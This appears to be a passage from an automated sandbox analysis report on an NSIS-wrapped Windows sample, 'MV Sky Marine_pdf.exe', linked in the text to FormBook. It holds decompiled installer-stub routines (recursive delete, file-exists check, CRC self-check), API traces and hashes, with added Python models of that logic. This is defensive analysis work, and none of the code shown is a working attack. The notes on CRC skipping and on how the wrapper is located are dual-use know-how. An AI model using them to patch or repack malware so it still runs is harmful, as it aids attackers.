                                                                                                  						lstrcatA(_t72, 0x409010);
                                                                                                  						L11:
                                                                                                  						_t70 =  &(_t72[lstrlenA(_t72)]);
                                                                                                  						_t37 = FindFirstFileA(0x79fda8,  &_v332);
                                                                                                  						__eflags = _t37 - 0xffffffff;
                                                                                                  						_a4 = _t37;
                                                                                                  						if(_t37 == 0xffffffff) {
                                                                                                  							L29:
                                                                                                  							__eflags = _v8;
                                                                                                  							if(_v8 != 0) {
                                                                                                  								_t31 = _t70 - 1;
                                                                                                  								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                                                                  								__eflags =  *_t31;
                                                                                                  							}
                                                                                                  							goto L31;
                                                                                                  						} else {
                                                                                                  							goto L12;
                                                                                                  						}
                                                                                                  						do {
                                                                                                  							L12:
                                                                                                  							_t75 =  &(_v332.cFileName);
                                                                                                  							_t49 = E00405842( &(_v332.cFileName), 0x3f);
                                                                                                  							__eflags =  *_t49;
                                                                                                  							if( *_t49 != 0) {
                                                                                                  								__eflags = _v332.cAlternateFileName;
                                                                                                  								if(_v332.cAlternateFileName != 0) {
                                                                                                  									_t75 =  &(_v332.cAlternateFileName);
                                                                                                  								}
                                                                                                  							}
                                                                                                  							__eflags =  *_t75 - 0x2e;
                                                                                                  							if( *_t75 != 0x2e) {
                                                                                                  								L19:
                                                                                                  								E00405D24(_t70, _t75);
                                                                                                  								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                                                                  								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                                                                  									E004059DC(_t72);
                                                                                                  									_t52 = DeleteFileA(_t72);
                                                                                                  									__eflags = _t52;
                                                                                                  									if(_t52 != 0) {
                                                                                                  										E00405010(0xfffffff2, _t72);
                                                                                                  									} else {
                                                                                                  										__eflags = _a8 & 0x00000004;
                                                                                                  										if((_a8 & 0x00000004) == 0) {
                                                                                                  											 *0x7a2828 =  *0x7a2828 + 1;
                                                                                                  										} else {
                                                                                                  											E00405010(0xfffffff1, _t72);
                                                                                                  											E00405A72(__eflags, _t72, 0);
                                                                                                  										}
                                                                                                  									}
                                                                                                  								} else {
                                                                                                  									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                  									if(__eflags == 0) {
                                                                                                  										E00405649(_t70, __eflags, _t72, _a8);
                                                                                                  									}
                                                                                                  								}
                                                                                                  								goto L27;
                                                                                                  							}
                                                                                                  							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                                                                  							__eflags = _t61;
                                                                                                  							if(_t61 == 0) {
                                                                                                  								goto L27;
                                                                                                  							}
                                                                                                  							__eflags = _t61 - 0x2e;
                                                                                                  							if(_t61 != 0x2e) {
                                                                                                  								goto L19;
                                                                                                  							}
                                                                                                  							__eflags =  *((char*)(_t75 + 2));
                                                                                                  							if( *((char*)(_t75 + 2)) == 0) {
                                                                                                  								goto L27;
                                                                                                  							}
                                                                                                  							goto L19;
                                                                                                  							L27:
                                                                                                  							_t55 = FindNextFileA(_a4,  &_v332);
                                                                                                  							__eflags = _t55;
                                                                                                  						} while (_t55 != 0);
                                                                                                  						_t37 = FindClose(_a4);
                                                                                                  						goto L29;
                                                                                                  					}
                                                                                                  					__eflags =  *0x79fda8 - 0x5c;
                                                                                                  					if( *0x79fda8 != 0x5c) {
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					goto L10;
                                                                                                  				} else {
                                                                                                  					__eflags = _t37;
                                                                                                  					if(_t37 == 0) {
                                                                                                  						L31:
                                                                                                  						__eflags = _v8;
                                                                                                  						if(_v8 == 0) {
                                                                                                  							L39:
                                                                                                  							return _t37;
                                                                                                  						}
                                                                                                  						__eflags = _v12;
                                                                                                  						if(_v12 != 0) {
                                                                                                  							_t37 = E0040601F(_t72);
                                                                                                  							__eflags = _t37;
                                                                                                  							if(_t37 == 0) {
                                                                                                  								goto L39;
                                                                                                  							}
                                                                                                  							E00405817(_t72);
                                                                                                  							E004059DC(_t72);
                                                                                                  							_t37 = RemoveDirectoryA(_t72);
                                                                                                  							__eflags = _t37;
                                                                                                  							if(_t37 != 0) {
                                                                                                  								return E00405010(0xffffffe5, _t72);
                                                                                                  							}
                                                                                                  							__eflags = _a8 & 0x00000004;
                                                                                                  							if((_a8 & 0x00000004) == 0) {
                                                                                                  								goto L33;
                                                                                                  							}
                                                                                                  							E00405010(0xfffffff1, _t72);
                                                                                                  							return E00405A72(__eflags, _t72, 0);
                                                                                                  						}
                                                                                                  						L33:
                                                                                                  						 *0x7a2828 =  *0x7a2828 + 1;
                                                                                                  						return _t37;
                                                                                                  					}
                                                                                                  					__eflags = _a8 & 0x00000002;
                                                                                                  					if((_a8 & 0x00000002) == 0) {
                                                                                                  						goto L31;
                                                                                                  					}
                                                                                                  					goto L5;
                                                                                                  				}
                                                                                                  			}
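The routine decompiled above is a recursive delete helper rather than anything FormBook-specific: it appends "\*.*" to the directory, walks the FindFirstFileA/FindNextFileA results, skips "." and "..", falls back to the 8.3 cAlternateFileName when the long name contains '?', calls DeleteFileA on files, descends into subdirectories only when (_a8 & 3) == 3, calls RemoveDirectoryA on the directory after the loop, and on any failure either increments the counter at 0x7a2828 or, when bit 0x4 of _a8 is set, logs and hands the path to E00405A72 (by its position in the failure branch, a deferred delete). Together with the Temp-directory string this is installer-stub cleanup plumbing, which is worth recognising before spending analysis time on it. The Python below is an added model of that control flow written for this report, not code from the sample or from the sandbox; the flag names, the reading of E00405A72 as a deferred delete, and the single-file branch for calls without the directory flag are assumptions, and the directory tree it runs on is constructed inline so the block runs offline.

```python
import os
import shutil
import tempfile
from dataclasses import dataclass, field
from typing import Callable, List, Optional

# Flag bits exactly as the decompiled code tests them (_a8 & 0x3, & 0x2, & 0x4).
# The names are assumptions for readability; the report does not name them.
FLAG_DIR = 0x1      # assumed: the argument is a directory to remove afterwards
FLAG_RECURSE = 0x2  # assumed: enumerate "\*.*" under the directory first
FLAG_DEFER = 0x4    # assumed: on failure, queue a deferred delete (E00405A72) instead of counting an error


@dataclass
class DeleteResult:
    deleted: List[str] = field(default_factory=list)
    deferred: List[str] = field(default_factory=list)
    errors: int = 0  # models the counter at 0x7a2828, incremented on each failed delete


def is_dot_entry(name: str) -> bool:
    """The check between L12 and L27: only '.' and '..' are skipped; '...' is a real entry."""
    return name == "." or name == ".."


def _try_delete(path: str, flags: int, op: Callable[[str], None], result: DeleteResult) -> None:
    """Outcome handling shared by the DeleteFileA and RemoveDirectoryA call sites."""
    try:
        op(path)
        result.deleted.append(path)       # E00405010(0xfffffff2 / 0xffffffe5, path): success log
    except OSError:
        if flags & FLAG_DEFER:
            result.deferred.append(path)  # E00405010(0xfffffff1, path); E00405A72(path, 0)
        else:
            result.errors += 1            # *0x7a2828 += 1


def delete_tree(path: str, flags: int, result: Optional[DeleteResult] = None,
                unlink: Callable[[str], None] = os.remove,
                rmdir: Callable[[str], None] = os.rmdir) -> DeleteResult:
    """Control flow of the decompiled routine; unlink/rmdir are injectable so failures can be simulated."""
    if result is None:
        result = DeleteResult()
    # Enumerate when deleting files by pattern (no FLAG_DIR) or when removing a directory recursively.
    if not (flags & FLAG_DIR) or (flags & FLAG_RECURSE):
        with os.scandir(path) as it:      # FindFirstFileA(path + "\*.*") ... FindNextFileA loop
            entries = sorted(it, key=lambda e: e.name)
        for entry in entries:
            if is_dot_entry(entry.name):
                continue
            child = os.path.join(path, entry.name)
            if entry.is_dir(follow_symlinks=False):  # dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY
                if (flags & 3) == 3:                 # the (_a8 & 3) - 3 test guarding the recursive call
                    delete_tree(child, flags, result, unlink, rmdir)
            else:
                _try_delete(child, flags, unlink, result)
    if flags & FLAG_DIR:
        _try_delete(path, flags, rmdir, result)  # RemoveDirectoryA after the loop
    return result


def build_sample_tree() -> str:
    """Constructed fixture (not from the sample): a small tree resembling an installer's temp directory."""
    root = tempfile.mkdtemp(prefix="nstmp_")
    os.makedirs(os.path.join(root, "plugins"))
    for rel in ("payload.bin", os.path.join("plugins", "a.dll"), os.path.join("plugins", "b.dll")):
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(b"\x00" * 16)
    return root


def run_scenarios() -> dict:
    """Four calls that exercise each branch; returns what each one did."""
    out = {}
    root = build_sample_tree()
    # Directory flag without recursion: RemoveDirectoryA on a non-empty directory fails -> counter
    r = delete_tree(root, FLAG_DIR)
    out["dir_only"] = (r.errors, os.path.isdir(root))
    # Pattern delete: files under the directory go, subdirectories are left alone ((flags & 3) != 3)
    delete_tree(root, FLAG_RECURSE)
    out["files_only"] = (os.path.exists(os.path.join(root, "payload.bin")),
                         os.path.isdir(os.path.join(root, "plugins")))
    # Full recursive removal: two dll files, the plugins directory and the root itself
    r = delete_tree(root, FLAG_DIR | FLAG_RECURSE)
    out["recursive"] = (r.errors, len(r.deleted), os.path.exists(root))
    # A file that is "in use" with the defer bit set: the locked file and both directories above it
    # are queued for deferred deletion and nothing is counted as an error
    root = build_sample_tree()

    def locked_unlink(p: str) -> None:
        if os.path.basename(p) == "a.dll":
            raise PermissionError("simulated sharing violation")
        os.remove(p)

    r = delete_tree(root, FLAG_DIR | FLAG_RECURSE | FLAG_DEFER, unlink=locked_unlink)
    out["deferred"] = (r.errors, len(r.deferred))
    shutil.rmtree(root, ignore_errors=True)
    return out


if __name__ == "__main__":
    for name, value in run_scenarios().items():
        print(name, value)
```

The injectable unlink/rmdir callables are what make the failure branches observable: the same locked-file situation produces either a bumped error counter or a growing deferred-delete list depending only on bit 0x4, which is the distinction an analyst needs when deciding whether a failed cleanup will leave artefacts on disk after reboot.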

                                                                                                  APIs
                                                                                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 00405667
                                                                                                  • lstrcatA.KERNEL32(0079FDA8,\*.*,0079FDA8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004056B1
                                                                                                  • lstrcatA.KERNEL32(?,00409010,?,0079FDA8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004056D2
                                                                                                  • lstrlenA.KERNEL32(?,?,00409010,?,0079FDA8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004056D8
                                                                                                  • FindFirstFileA.KERNEL32(0079FDA8,?,?,?,00409010,?,0079FDA8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004056E9
                                                                                                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040579B
                                                                                                  • FindClose.KERNEL32(?), ref: 004057AC
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" , xrefs: 00405649
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405653
                                                                                                  • \*.*, xrefs: 004056AB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                  • API String ID: 2035342205-3079480097
                                                                                                  • Opcode ID: 5f788f06b89a6f593caa0759886f33c3c04a37fdfb866b5ecdaca1cc1665d1f8
                                                                                                  • Instruction ID: 0eb855ff9a2b1247dbd44d963b35209b971b417283db5505a9d7fa508270b5e2
                                                                                                  • Opcode Fuzzy Hash: 5f788f06b89a6f593caa0759886f33c3c04a37fdfb866b5ecdaca1cc1665d1f8
                                                                                                  • Instruction Fuzzy Hash: B251B331404A45A6DF227B218C89BBF3A68DF82714F54847BF954761D2C73C4982EF6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			// NSIS stub helper: tests whether a path exists by opening and immediately
                                                                                                  			// closing a FindFirstFileA search. 0x7a0df0 is the WIN32_FIND_DATAA buffer in
                                                                                                  			// the stub's data area; its address doubles as the non-zero "found" result.
                                                                                                  			E0040601F(CHAR* _a4) {
                                                                                                  				void* _t2;

                                                                                                  				_t2 = FindFirstFileA(_a4, 0x7a0df0); // executed
                                                                                                  				if(_t2 == 0xffffffff) {
                                                                                                  					return 0; // INVALID_HANDLE_VALUE: path does not exist (or is not accessible)
                                                                                                  				}
                                                                                                  				FindClose(_t2);
                                                                                                  				return 0x7a0df0;
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNELBASE(?,007A0DF0,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,0040593B,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 0040602A
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406036
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\nssBDFE.tmp, xrefs: 0040601F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp
                                                                                                  • API String ID: 2295610775-1451364421
                                                                                                  • Opcode ID: bc2cfeb157d82695ec663282c85cb8c9d1102ce5ec4d2213d5806e87fc238169
                                                                                                  • Instruction ID: 364cb9d6a100f6bd6ba80fb0995bd87ec04d479e3a2a5af2b7d6f24bd86a5df0
                                                                                                  • Opcode Fuzzy Hash: bc2cfeb157d82695ec663282c85cb8c9d1102ce5ec4d2213d5806e87fc238169
                                                                                                  • Instruction Fuzzy Hash: 03D01272A881205BC32097786D0C94B7A599B453317114F32B926F62E1C638AC6286AE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,034CF0BF,873D1860,034CF0BF,5C7BF6E9,034CF0BF,EA31D3B6), ref: 1000438C
                                                                                                  • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 100043B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 2353314856-0
                                                                                                  • Opcode ID: f11ef60f4f72861f0e902d52d03d54262a964c47fcc8cc29cceff05a9811adf3
                                                                                                  • Instruction ID: 949b434bc18860b61ca34e2c4fc247fedfafb0af8dbffc8aab7b2c9691e331bf
                                                                                                  • Opcode Fuzzy Hash: f11ef60f4f72861f0e902d52d03d54262a964c47fcc8cc29cceff05a9811adf3
                                                                                                  • Instruction Fuzzy Hash: A4113CB4D0014DFFEB10DFB1CC49AAEBBB8EF05380F1255A5E914E2154EB305B509B59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 96%
                                                                                                  			// NSIS stub self-check (the error strings below are NSIS's own). Opens the running
                                                                                                  			// image, reads it in 512-byte blocks until the 28-byte "firstheader" is found,
                                                                                                  			// verifies the CRC of the data that follows it, then loads the installer header
                                                                                                  			// into memory. _a4 carries command-line flags (0x2 silent, 0x4 skip CRC,
                                                                                                  			// 0x8 force CRC) that are OR-ed with the flags stored in the firstheader.
                                                                                                  			E00402CA5(void* __eflags, signed int _a4) {
                                                                                                  				long _v8;
                                                                                                  				long _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				long _v20;
                                                                                                  				intOrPtr _v24;
                                                                                                  				intOrPtr _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				intOrPtr _v36;
                                                                                                  				signed int _v40;
                                                                                                  				char _v300;
                                                                                                  				long _t54;
                                                                                                  				void* _t57;
                                                                                                  				void* _t61;
                                                                                                  				intOrPtr _t64;
                                                                                                  				void* _t67;
                                                                                                  				intOrPtr* _t69;
                                                                                                  				intOrPtr _t70;
                                                                                                  				long _t81;
                                                                                                  				void* _t82;
                                                                                                  				signed int _t88;
                                                                                                  				intOrPtr _t91;
                                                                                                  				void* _t99;
                                                                                                  				signed int _t101;
                                                                                                  				void* _t103;
                                                                                                  				long _t104;
                                                                                                  				long _t107;
                                                                                                  				void* _t108;
                                                                                                  				void* _t45; // used in the block-pointer walk below; the decompiler left it undeclared

                                                                                                  				_v8 = 0;
                                                                                                  				_v12 = 0;
                                                                                                  				 *0x7a27ac = GetTickCount() + 0x3e8; // 1000 ms from now: deadline before the stub shows its verify window
                                                                                                  				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe", 0x400); // path of the running image
                                                                                                  				_t103 = E004059FB("C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe", 0x80000000, 3); // open self: GENERIC_READ, OPEN_EXISTING
                                                                                                  				 *0x409014 = _t103;
                                                                                                  				if(_t103 == 0xffffffff) {
                                                                                                  					return "Error launching installer";
                                                                                                  				}
                                                                                                  				E00405D24("C:\\Users\\alfons\\Desktop", "C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe");
                                                                                                  				E00405D24(0x7aa000, E0040585E("C:\\Users\\alfons\\Desktop"));
                                                                                                  				_t54 = GetFileSize(_t103, 0);
                                                                                                  				 *0x79d950 = _t54;
                                                                                                  				_t107 = _t54;
                                                                                                  				if(_t54 <= 0) {
                                                                                                  					L22:
                                                                                                  					E00402C06(1);
                                                                                                  					if( *0x7a27b4 == 0) {
                                                                                                  						goto L30;
                                                                                                  					}
                                                                                                  					if(_v12 == 0) {
                                                                                                  						L26:
                                                                                                  						_t57 = GlobalAlloc(0x40, _v20); // executed; GMEM_ZEROINIT, _v20 = length_of_header from the firstheader
                                                                                                  						_t108 = _t57;
                                                                                                  						 *0x40b088 = 0xb;
                                                                                                  						 *0x40b0a0 = 0; // executed
                                                                                                  						E00405A2A( &_v300, "C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed; builds a temp-file name under %TEMP% (the nss*.tmp names in the API trace)
                                                                                                  						_t61 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed; GENERIC_READ|GENERIC_WRITE, CREATE_ALWAYS, FILE_ATTRIBUTE_TEMPORARY|FILE_FLAG_DELETE_ON_CLOSE
                                                                                                  						 *0x409018 = _t61;
                                                                                                  						if(_t61 != 0xffffffff) {
                                                                                                  							_t64 = E00403227( *0x7a27b4 + 0x1c);
                                                                                                  							 *0x79d954 = _t64;
                                                                                                  							 *0x795948 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                                  							_t67 = E00402F4E(_v16, 0xffffffff, 0, _t108, _v20); // executed
                                                                                                  							if(_t67 == _v20) {
                                                                                                  								 *0x7a27b0 = _t108;
                                                                                                  								 *0x7a27b8 =  *_t108;
                                                                                                  								if((_v40 & 0x00000001) != 0) {
                                                                                                  									 *0x7a27bc =  *0x7a27bc + 1;
                                                                                                  								}
                                                                                                  								_t45 = _t108 + 0x44; // 0x44: end of the eight 8-byte block descriptors that follow the header's flags dword
                                                                                                  								_t69 = _t45;
                                                                                                  								_t99 = 8;
                                                                                                  								do { // turn each block's stored offset into an absolute pointer (offset += header base)
                                                                                                  									_t69 = _t69 - 8;
                                                                                                  									 *_t69 =  *_t69 + _t108;
                                                                                                  									_t99 = _t99 - 1;
                                                                                                  								} while (_t99 != 0);
                                                                                                  								_t70 =  *0x795944; // 0x2dc9b in this run
                                                                                                  								 *((intOrPtr*)(_t108 + 0x3c)) = _t70; // the last block descriptor is set from this global instead of being relocated
                                                                                                  								E004059BC(0x7a27c0, _t108 + 4, 0x40); // copy the 0x40 bytes of block descriptors into the stub's globals
                                                                                                  								return 0;
                                                                                                  							}
                                                                                                  							goto L30;
                                                                                                  						}
                                                                                                  						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                  					}
                                                                                                  					E00403227( *0x795940); // seek to the end of the hashed region
                                                                                                  					if(E004031F5( &_a4, 4) == 0 || _v8 != _a4) { // read the stored 4-byte CRC and compare with the computed one
                                                                                                  						goto L30;
                                                                                                  					} else {
                                                                                                  						goto L26;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					do {
                                                                                                  						_t104 = _t107;
                                                                                                  						asm("sbb eax, eax");
                                                                                                  						_t81 = ( ~( *0x7a27b4) & 0x00007e00) + 0x200;
                                                                                                  						if(_t107 >= _t81) {
                                                                                                  							_t104 = _t81;
                                                                                                  						}
                                                                                                  						_t82 = E004031F5(0x795950, _t104); // executed
                                                                                                  						if(_t82 == 0) {
                                                                                                  							E00402C06(1);
                                                                                                  							L30:
                                                                                                  							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                  						}
                                                                                                  						if( *0x7a27b4 != 0) {
                                                                                                  							if((_a4 & 0x00000002) == 0) {
                                                                                                  								E00402C06(0);
                                                                                                  							}
                                                                                                  							goto L19;
                                                                                                  						}
                                                                                                  						E004059BC( &_v40, 0x795950, 0x1c);
                                                                                                  						_t88 = _v40;
                                                                                                  						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                                                                  							// firstheader found: only the low nibble of the flags may be set, the signature is
                                                                                                  							// 0xdeadbeef and the next three dwords spell "Null" "soft" "Inst" (little-endian)
                                                                                                  							_a4 = _a4 | _t88; // merge header flags into the command-line flags
                                                                                                  							_t101 =  *0x795940; // 0x0
                                                                                                  							 *0x7a2840 =  *0x7a2840 | _a4 & 0x00000002; // silent flag
                                                                                                  							_t91 = _v16; // length_of_all_following_data
                                                                                                  							 *0x7a27b4 = _t101; // remember the file offset of the firstheader
                                                                                                  							if(_t91 > _t107) {
                                                                                                  								goto L30;
                                                                                                  							}
                                                                                                  							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) { // force-CRC set, or skip-CRC not set: verify
                                                                                                  								_v12 = _v12 + 1; // do_crc
                                                                                                  								_t107 = _t91 - 4; // bytes still to hash: everything that follows, minus the trailing 4-byte CRC
                                                                                                  								if(_t104 > _t107) {
                                                                                                  									_t104 = _t107;
                                                                                                  								}
                                                                                                  								goto L19;
                                                                                                  							} else {
                                                                                                  								goto L22;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						L19:
                                                                                                  						if(_t107 <  *0x79d950) { // false only for the first 512-byte block, which the CRC does not cover
                                                                                                  							_v8 = E00406123(_v8, 0x795950, _t104); // running CRC over this block
                                                                                                  						}
                                                                                                  						 *0x795940 =  *0x795940 + _t104;
                                                                                                  						_t107 = _t107 - _t104;
                                                                                                  					} while (_t107 > 0);
                                                                                                  					goto L22;
                                                                                                  				}
                                                                                                  			}
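                                                                                                  The routine above is the installer stub's own integrity check: walk the image in 512-byte blocks, stop at the first block that begins with the firstheader (flags, 0xdeadbeef, "NullsoftInst", length_of_header, length_of_all_following_data), then confirm that the CRC stored in the last four bytes of the declared region matches the CRC computed over everything before it. The Python below is an added example that replays that check offline so the NSIS wrapper around a sample like this one can be located and validated without running it; it is not code from the report, from the sample, or from the NSIS project. It assumes that the stub's CRC routine (E00406123) is the standard CRC-32 that zlib.crc32 computes, that the first 512-byte block is excluded from the CRC because the decompile's `_t107 < *0x79d950` test is false only on that block, and that a synthetic image built by build_sample (a constructed stand-in, not a real installer) is an adequate stand-in for the real layout. The names find_firstheader, check_integrity and build_sample and the result strings "ok", "invalid" and "unchecked" are this example's own.

```python
"""Locate an NSIS firstheader and replay the stub's integrity check (added example)."""
import struct
import sys
import zlib
from dataclasses import dataclass
from typing import Optional

# Field values the decompiled routine compares against (NSIS firstheader).
FH_SIG = 0xDEADBEEF
FH_INT1, FH_INT2, FH_INT3 = 0x6C6C754E, 0x74666F73, 0x74736E49   # "Null", "soft", "Inst"
FH_FLAGS_MASK = 0x0F
FH_FLAGS_UNINSTALL, FH_FLAGS_SILENT, FH_FLAGS_NO_CRC, FH_FLAGS_FORCE_CRC = 1, 2, 4, 8
# flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data: 28 bytes (0x1c)
FH_STRUCT = struct.Struct("<7I")
SCAN_STEP = 512   # the stub reads 512-byte blocks until the header is found


@dataclass
class FirstHeader:
    offset: int
    flags: int
    length_of_header: int
    length_of_all_following_data: int


def find_firstheader(image: bytes) -> Optional[FirstHeader]:
    """Scan 512-byte-aligned offsets for a valid firstheader, as the stub does."""
    for off in range(0, len(image) - FH_STRUCT.size + 1, SCAN_STEP):
        flags, sig, i1, i2, i3, hdr_len, follow_len = FH_STRUCT.unpack_from(image, off)
        if (flags & ~FH_FLAGS_MASK) == 0 and sig == FH_SIG \
                and (i1, i2, i3) == (FH_INT1, FH_INT2, FH_INT3):
            return FirstHeader(off, flags, hdr_len, follow_len)
    return None


def check_integrity(image: bytes, cl_flags: int = 0) -> str:
    """Return 'ok', 'invalid' or 'unchecked' following the stub's decision tree.

    cl_flags plays the role of the routine's _a4 argument (command-line flags),
    which the stub ORs with the flags stored in the firstheader.
    """
    fh = find_firstheader(image)
    if fh is None:
        return "invalid"                      # "Installer integrity check has failed"
    if fh.length_of_all_following_data < FH_STRUCT.size + 4:
        return "invalid"                      # region too small to hold header + CRC
    if fh.length_of_all_following_data > len(image) - fh.offset:
        return "invalid"                      # header claims more data than the file holds
    flags = cl_flags | fh.flags
    if not (flags & FH_FLAGS_FORCE_CRC) and (flags & FH_FLAGS_NO_CRC):
        return "unchecked"                    # built with CRC disabled: the stub skips the CRC
    # The stored CRC is the last 4 bytes of the region described by the header. It covers
    # everything before it except the first 512-byte block (assumption: mirrors the stub's
    # `left < file size` test, which is false only on that block).
    end = fh.offset + fh.length_of_all_following_data - 4
    computed = zlib.crc32(image[SCAN_STEP:end]) & 0xFFFFFFFF
    (stored,) = struct.unpack_from("<I", image, end)
    return "ok" if computed == stored else "invalid"


def build_sample(stub_size: int = 1024, payload: bytes = b"\x90" * 40,
                 flags: int = 0, corrupt: bool = False) -> bytes:
    """Construct a synthetic image with the stub's layout (constructed data, not a real installer).

    stub_size must be a multiple of 512 so the firstheader lands on a scan boundary.
    """
    stub = b"MZ" + b"\0" * (stub_size - 2)           # stand-in for the PE stub
    follow_len = FH_STRUCT.size + len(payload) + 4   # firstheader + payload + CRC
    fh = FH_STRUCT.pack(flags, FH_SIG, FH_INT1, FH_INT2, FH_INT3, len(payload), follow_len)
    body = stub + fh + payload
    crc = zlib.crc32(body[SCAN_STEP:]) & 0xFFFFFFFF
    if corrupt:                                       # flip one payload byte after the CRC was taken
        body = body[:-1] + bytes([body[-1] ^ 0xFF])
    return body + struct.pack("<I", crc)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print("firstheader:", find_firstheader(data))
    print("integrity:", check_integrity(data))
```

Run it against a dropped file to get the firstheader offset (the point after which the compressed header and data block begin) and the outcome the stub itself would reach. A result of "unchecked" means the installer was built with the CRC disabled and the stub will run it even after byte edits, which is worth noting when an NSIS-wrapped sample has been patched or trimmed.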

                                                                                                  0x00402f28
                                                                                                  0x00402f2a
                                                                                                  0x00402f2a
                                                                                                  0x00402f2d
